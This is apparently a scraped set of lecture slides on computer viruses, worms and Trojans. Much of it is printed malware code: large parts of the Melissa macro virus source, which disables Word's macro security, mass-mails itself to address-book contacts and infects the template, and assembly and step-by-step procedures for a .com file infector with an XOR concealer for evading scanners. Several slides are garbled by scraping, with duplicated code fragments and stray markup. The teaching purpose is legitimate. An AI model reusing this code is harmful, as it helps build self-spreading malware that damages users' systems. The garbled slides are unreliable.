Propagation of malicious code Malicious indicates the potential
to do damage. Usually classified by the type of propagation.
Sometimes classified by Platforms and mechanisms it requires to run
E.g. macro viruses. Virus/Trojan/worm may not actually cause
damages.
Slide 3
Viruses Program or piece of code that will reproduce itself.
Sometimes perform a particular action. Definition from RFC 1135 A
virus is a piece of code that inserts itself into a host, including
operating systems, to propagate. It cannot run independently. It
requires that its host program be run to activate it.
Slide 4
Worm A worm is similar to a virus, but it does not locally
reproduce. Propagates between systems only. Definition from RFC
1135 A worm is a program that can run independently, will consume
the resources of its host from within in order to maintain itself
and can propagate a complete working version of itself on to other
machines.
Slide 5
Macro Virus Sometimes considered worms. Require a host program
to process/run it in order for it to execute. Often written in VBA
(Visual Basic for Application) for Word, Access, Excel, PowerPoint,
and outlook etc. E.g. Melissa
Slide 6
Trojan Horses Code disguised as benign programs, but behave in
an unexpected, usually malicious manner. User needs to be convinced
to accept/run them. E.g. Pokemon worm, which will display animated
pictures of bouncing Pikachu on your screen while it e-mails itself
to everyone in your address book and prepares to delete every
files.
Slide 7
The Trojan horses initially appears as an e-mail with the title
"Pikachu Pokemon" and the English message "Pikachu is your friend.
The above picture is what the users see when executing pokemon.exe
(its attachment). What they dont see is the application e-mailing
itself and deleting files from the system.
Slide 8
Anatomy of a Virus Two primary components Propagation mechanism
Payload Propagation Method by which the virus spreads itself. Old
days: single PC, transferred to other hosts by ways of floppy
diskettes. Nowadays: internet.
Slide 9
Types of Propagation Parasitic Propagates by being a parasite
on other files. Attaching itself in some manner that still leaves
the original file usable..com and.exe files of MS-DOS Macro virus
Boot sector infectors Copy themselves to the bootable portion of
the hard (or floppy) disk. The virus gain control when the system
is booted.
Slide 10
Normal boot procedure It first goes through its usual POST
Power On Self Test BIOS (Basic Input/Output System) does what is
referred to a as bootstrap Checking for a valid bootable disk For a
hard drive to be bootable, it must contain a Master Boot Record
(MBR). Chuck of code that lies at the beginning of the hard drive.
Understand the partition table.
Slide 11
The MBR code will look for a particular partition that is
marked bootable (MSDOS fdisk: active), and then transfer control to
the code. This code is known as the boot sector. Viruses have two
opportunities to take control. Insert themselves into the MBR
position They can gain control under all situations At the expense
of having to deal with reading and booting via the partition
table.
Slide 12
Insert themselves into the boot sector of a partition Boot
sector viruses tend to take the existing MBR or boot sector code,
relocate it elsewhere, and then insert themselves into the record.
When the system boots, they can do their things, and then transfer
control the the relocated code that they replaced.
Slide 13
Multi-partite Refers to viruses that can use multiple means of
infection, such as MBR Boot sector Parasitic
Slide 14
Payload Refers to what the virus does (besides propagation)
once executed. Do nothing Do cute things Malicious damage such as
delete your partition table. Some viruses have a particular
trigger. Date Number of successful infections
Slide 15
Smart viruses usually use infrequent trigger so that they have
ample time to ensure they have properly propagated, before alerting
the users.
Slide 16
Case Study I: Melissa Melissa works by infecting the
Document_Open() macro of Microsoft word. Run immediately when the
user opens the word files. Private Sub document_open() On Error
Resume Next
Slide 17 ""> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled =
False Options.ConfirmConversions = (1 - 1): Options.VirusProtection
= (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If"> ""
title="Disable the macro security features If
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\9.0\Word\Security", "Level") "">
Disable the macro security features If
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\9.0\Word\Security", "Level") "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled =
False Options.ConfirmConversions = (1 - 1): Options.VirusProtection
= (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If
Slide 18 "... by Kwyjibo" Then">
MAPI stands for Messaging API, a way for Windows applications
to interface with various e-mail functionalities. A way to tell if
it has already infected the host. Dim UngaDasOutlook, DasMapiName,
BreakUmOffASlice Set UngaDasOutlook =
CreateObject("Outlook.Application") Set DasMapiName =
UngaDasOutlook.GetNameSpace("MAPI") If
System.PrivateProfileString("", "HKEY_CURRENT_USER\
Software\Microsoft\Office\", " Melissa ?") "... by Kwyjibo"
Then
Slide 19 50 Then oo = AddyBook.AddressEntries.Count Next
oo">
To see if the application is outlook Compose of a list of the
first 50 email addresses from the address book If UngaDasOutlook =
"Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To
DasMapiName.AddressLists.Count Set AddyBook =
DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice =
UngaDasOutlook.CreateItem(0) For oo = 1 To
AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo
= AddyBook.AddressEntries.Count Next oo
Slide 20 Melissa ?") = "... by Kwyjibo" End If">
Actually send emails Wrap up BreakUmOffASlice.Subject =
"Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for...
don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y
DasMapiName.Logoff End If p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\", "Melissa ?") = "... by Kwyjibo"
End If
Slide 21
Check to see if the active document and document template are
infected. Infect it.
Slide 22
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set
NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL =
NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines
BGN = 2 If ADI1.Name " Melissa " Then If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name =
" Melissa " DoAD = True End If If NTI1.Name " Melissa " Then If
NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect
= NTI1 NTI1.Name = " Melissa " DoNT = True End If If DoNT True And
DoAD True Then GoTo CYA
Slide 23
Modifying the Document_Open() and Document_Close() function of
the active document. Every new document created, upon closing or
saving will run the Melissa worm. Saving the current document.
Slide 24
Case Study:.com Virus A.com virus may be divided into three
parts. Replicator Concealer Bomb (payload)
Slide 25
Replicator Spread the virus. Copy rest of the code at the end.
The uninfected fileThe virus code
Slide 26
Copy small portion of its code to the beginning of the file.
Copy the second part of itself to the end of the file. What do V1
and V2 do? V1 transfers control of the program to V2.
Slide 27
The code to do this is simple: The value of Duh must be changed
to reflect the length of the file that is infected. Dup = length of
V1+ original size of the inflect file+ 256 (to account for the
start position). E.g. if file size = 79 and V1=6 Dup = 6+79+256 =
341. Another approach JMP FAR PTR Duh ; Takes four bytes Duh DW
V2_Start ; Takes two bytes DB 1101001b ; Code for JMP ; (2
byte-displacement) Duh DW V2_Start - OFFSET Duh ; 2 byte
displacement
Slide 28
V2 contains the rest of the code. The last part of V2 copies P1
over V1 (in memory) and then transfers the control to the beginning
of the file (in memory). MOV SI, V2_START ; V2_START is a LABEL
marking ; where V2 starts SUB SI, V1_LENGTH ; Go back to where P1
is stored MOV DI, 0100h ; All COM files are loaded @ ; CS:[100h] in
memory MOV CX, V1_LENGTH ; Move CX bytes REP MOVSB ; DS:[SI] ->
ES:[DI] MOV DI, 0100h JMP DI
Slide 29
The code assume that P1 is located just before V2. It also
assumes ES equals to CS. If these assumptions are false, we can
change it accordingly. PUSH CS ; Store CS POP ES ; and move it to
ES ; Note MOV ES, CS is not a ; valid instruction MOV SI, P1_START
; Move from wherever P1 is stored MOV DI, 0100h ; to CS:[100h] MOV
CX, V1_LENGTH REP MOVSB MOV DI, 0100h JMP DI
Slide 30
The code first moves CS into ES. Then sets the source pointer
of MOVSB to where P1 is located. Note that the offset of P1 is 100h
higher than the physical file location, as COM files are loaded
starting from CS:[100h]. Infecting.EXE file is much more
complicated.
Slide 31
Replicator portion Steps 1.Find a file to infect. 2.Check if it
is already infected. 3.If so, go back to 1 4.Infect it. 5.If
infected enough, quit 6.Otherwise, go back to 1 Finding a file to
infect Write a directory traversal procedure Issuing FINDFIRST and
FINDNEXT calls
Slide 32
Once you find the file, open it and read the first few bytes.
If they are the same as the first few bytes of V1, then the file is
already infected. Infection should take the following steps:
1.Change the file attributes to nothing. 2.Save the file date/time
stamps. 3.Close the file. 4.Open it again in read/write mode.
5.Save P1 and append it to the end of the file. 6.Copy V1 to the
beginning, but change the offset which it JMPs to so it transfers
control correctly. 7.Append V2 to the end of the file. 8.Restore
file attributes /date/time.
Slide 33
mov ah,3Fh ; Read first three mov cx, 3 ; bytes of the file lea
dx, [bp+offset buffer] ; to the buffer int 21h mov ax, 4202h ; SEEK
from EOF xor cx, cx ; DX:CX = offset xor dx, dx ; Returns filesize
int 21h ; in DX:AX sub ax, virus_size + 3 cmp word ptr [bp+offset
buffer+1], ax jnz infect_it bomb_out: mov ah, 3Eh ; else close the
file int 21h ; and go find another Sample code to Check if the file
has been infected.
Slide 34
Concealer Conceals the program from notice by the everyday user
and virus scanner. A simple XOR encryption: encrypt_val db ?
decrypt: encrypt: mov ah, encrypt_val mov cx, part_to_encrypt_end -
part_to_encrypt_start mov si, part_to_encrypt_start mov di, si
xor_loop: lodsb ; DS:[SI] -> AL xor al, ah stosb ; AL ->
ES:[DI] loop xor_loop ret
Slide 35
Bomb Does all nasty things to annoy the user. Some possible
bombs System slowdown Easily handled by trapping an interrupt and
causing a delay when it activates. File deletion. Message Display.
Killing/Replacing the partition table or boot sector of the hard
drive.
Slide 36
Anti-virus Techniques Integrity/behavioral Checkers Use good OS
Use virus scanner on computer and email- server. Use virus scanner
Do not open attachments to emails. Frequent backups.
Slide 37
Reference Kevin L. Poulsen, "Hack Proofing Your Network:
Internet Tradecraft", Chapter 14, p.383 405 Dark Angels Phunky
Virus Writing Guide http://www.sirkussystem.com/virus.html
Introduction Installment II: the replicator